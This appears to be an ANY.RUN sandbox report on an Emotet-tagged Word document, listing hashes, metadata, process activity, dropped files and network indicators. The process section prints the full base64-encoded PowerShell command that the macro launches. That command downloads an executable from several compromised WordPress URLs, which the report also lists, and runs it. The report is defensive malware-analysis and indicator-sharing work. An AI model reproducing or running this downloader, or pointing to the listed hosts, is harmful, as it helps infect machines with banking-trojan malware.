analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6296_1410.doc

Full analysis: https://app.any.run/tasks/bc20954c-1f51-4348-a6f0-76b41690d273
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 10:26:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Associate, Subject: bypass, Author: Filomena Mertz, Keywords: generating, Comments: bottom-line, Template: Normal.dotm, Last Saved By: Orpha Wisoky, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 07:26:00 2019, Last Saved Time/Date: Mon Oct 14 07:26:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5:

47824E9E42721C92E5CD14B7CC804639

SHA1:

F67B5FD2ECE97B5A489248CA88F192A2035AFB18

SHA256:

750B8560C0ED92477D795D9765A816C4530B2FACF801D9B270EDECDCB5248AB0

SSDEEP:

6144:CaxMtdtPWuM/b3Ftr6/DVokOe89/uvbuoh:CaedtPWuMX6/KeyM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2388)
    • PowerShell script executed

      • powershell.exe (PID: 2388)
    • Executed via WMI

      • powershell.exe (PID: 2388)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 932)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2388)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 932)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Kessler
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 205
Paragraphs: 1
Lines: 1
Company: Ruecker Inc
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 176
Words: 30
Pages: 1
ModifyDate: 2019:10:14 06:26:00
CreateDate: 2019:10:14 06:26:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Orpha Wisoky
Template: Normal.dotm
Comments: bottom-line
Keywords: generating
Author: Filomena Mertz
Subject: bypass
Title: Associate
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
932"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\6296_1410.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2388powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhADIAZQBkADIAOQA1ADEANgA4ADIAMgBiAD0AJwBhADAAeAAzADYANwA2ADUAZQBjAGMAMgA4ACcAOwAkAGEAMAB4AGMAZABjADQAZgA0ADAAYQBhAGUAZQAxACAAPQAgACcANwA5ADgAJwA7ACQAYQAwAHgAYQBkADEANQA0ADkANwAyADMANwAwADAAYQA9ACcAYQAwAHgAMgBjADgAOQBmADYANwA2AGIAYQAzAGUANgBjACcAOwAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADAAeABjAGQAYwA0AGYANAAwAGEAYQBlAGUAMQArACcALgBlAHgAZQAnADsAJABhADAAeABmAGMAYgBjAGIAMQBkADcAZAAzADAAMwA9ACcAYQAwAHgANAA0ADYANwBmAGIANwAwADkAZgAyADYAJwA7ACQAYQAwAHgANgA3ADIAZABlAGUAZAAxAGEANwA3AGIAZgBmAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUAbgB0ADsAJABhADAAeAAxAGEAZAA0AGIANQA2ADcAMwA4ADIAMAA0AD0AJwBoAHQAdABwADoALwAvAGMAbwBhAHMAdABhAGwAdABoAGUAcgBhAHAAeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwBoAHoAMAB1ADkAMwA0ADcALwAqAGgAdAB0AHAAOgAvAC8AYgByAGEAbgBkAHMAbwBmAHoAYQBtAGIAaQBhAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAwAHEAcwBzAGcAMwA4ADQAMQAvACoAaAB0AHQAcABzADoALwAvAGIAdQBzAGUAYQBjAHkAYwBsAGUALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBnAGsAMAA1ADYALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AawBzAGwAaQBuAGsALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHAAawA5ADcAMAA5ADYALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGgAbwBsAGwAeQB3AG8AbwBkAGMAbAB1AGIALgB4AHkAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHUAYQA2ADcAdgAzADIAOAA4AC8AJwAuACIAUwBwAEwAYABJAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADAAYgAwADYAZQA1ADEANABlAGEAOQAxAGYAMAA9ACcAYQAwAHgANgA0ADYANQA1AGYANwBlAGMAOQBhAGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEAIABpAG4AIAAkAGEAMAB4ADEAYQBkADQAYgA1ADYANwAzADgAMgAwADQAKQB7AHQAcgB5AHsAJABhADAAeAA2ADcAMgBkAGUAZQBkADEAYQA3ADcAYgBmAGYALgAiAEQAbwBgAHcAbgBgAEwAbwBgAEEAZABmAEkATABlACIAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEALAAgACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAOQA0AGIAMgA2ADIAMwBhADUAYQA0AD0AJwBhADAAeABlAGMANwA0AGQAOABlAGYAMAA0ADEAMwAxAGEANAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhACkALgAiAEwAYABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADMANwA5ADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQBSAHQAIgAoACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAMQAxADEANAA2AGMAOQA5ADgAYgBlAGMAMQA9ACcAYQAwAHgAYgBmAGQAYwAzADkANQAzAGEANABhAGQANQBlADEAJwA7AGIAcgBlAGEAawA7ACQAYQAwAHgAZgAxAGYAMwBhADkAOABmAGQAYgA1AGQAPQAnAGEAMAB4AGYANwA3ADEAYwA3ADcAOABiAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAYgBlADQAYQA2AGMAZQBkADAANgA2ADEANgA9ACcAYQAwAHgANgBlAGYANgBhADAAYgBlAGUANwBmACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 916
Read events
1 100
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
932WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7D3.tmp.cvr
MD5:
SHA256:
2388powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9GY7A9DHUN4UY3AE3UUE.temp
MD5:
SHA256:
2388powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AECE9601.wmfwmf
MD5:43815C7FAC499914BAB0B98C4B80D2A0
SHA256:78526A0C2F29813A984C4695F7A3270B7FF87EC8279C7C88E52699EC42EA0968
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2271AADD.wmfwmf
MD5:EDE32C4366ECEB9A63328AFDFE860FE2
SHA256:44EC6DC81BBCB1C1EA199C9EFC43C7E8058E0C98B7A213C4AE8D51DEA8EF1CD3
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\619EFF79.wmfwmf
MD5:B35F2EEFADF406044CE08915FB43E5E3
SHA256:CFFD0E97E60CD1F3E2E6165A08DC9EBE9EE6A77FF3837709BEC0A383AA1A23AB
2388powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b3f9.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
932WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D3E45E9E34C71A48C10FD945E9620BAF
SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D0B14D3B.wmfwmf
MD5:4B1D31F3528B30E4C8A9B5FB26336813
SHA256:A1B16030F4A98E85B86A89F65CFE4385AC1395AAF86EAE1D6570AA3657BEE53B
932WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C8896E00.wmfwmf
MD5:F5EC9F30617A6F4BE91718F3DEAF8F3F
SHA256:CD62F1FBFAB890C51562A74453DB5D5C0E3AD4DCC8DD0D19A788CBF16D83113E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2388
powershell.exe
GET
404
50.28.1.57:80
http://coastaltherapy.com/wp-includes/chz0u9347/
US
xml
345 b
suspicious
2388
powershell.exe
GET
404
160.153.133.145:80
http://brandsofzambia.com/wp-includes/0qssg3841/
US
xml
345 b
malicious
2388
powershell.exe
GET
404
147.139.135.175:80
http://www.bokslink.com/wp-includes/pk97096/
US
xml
345 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2388
powershell.exe
216.158.227.226:443
www.hollywoodclub.xyz
NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC
US
unknown
2388
powershell.exe
160.153.133.145:80
brandsofzambia.com
GoDaddy.com, LLC
US
suspicious
2388
powershell.exe
50.28.1.57:80
coastaltherapy.com
Liquid Web, L.L.C
US
suspicious
2388
powershell.exe
163.44.198.57:443
buseacycle.com
GMO-Z com NetDesign Holdings Co., Ltd.
TH
malicious
2388
powershell.exe
147.139.135.175:80
www.bokslink.com
US
unknown

DNS requests

Domain
IP
Reputation
coastaltherapy.com
  • 50.28.1.57
suspicious
brandsofzambia.com
  • 160.153.133.145
malicious
buseacycle.com
  • 163.44.198.57
malicious
www.bokslink.com
  • 147.139.135.175
unknown
www.hollywoodclub.xyz
  • 216.158.227.226
unknown

Threats

No threats detected
No debug info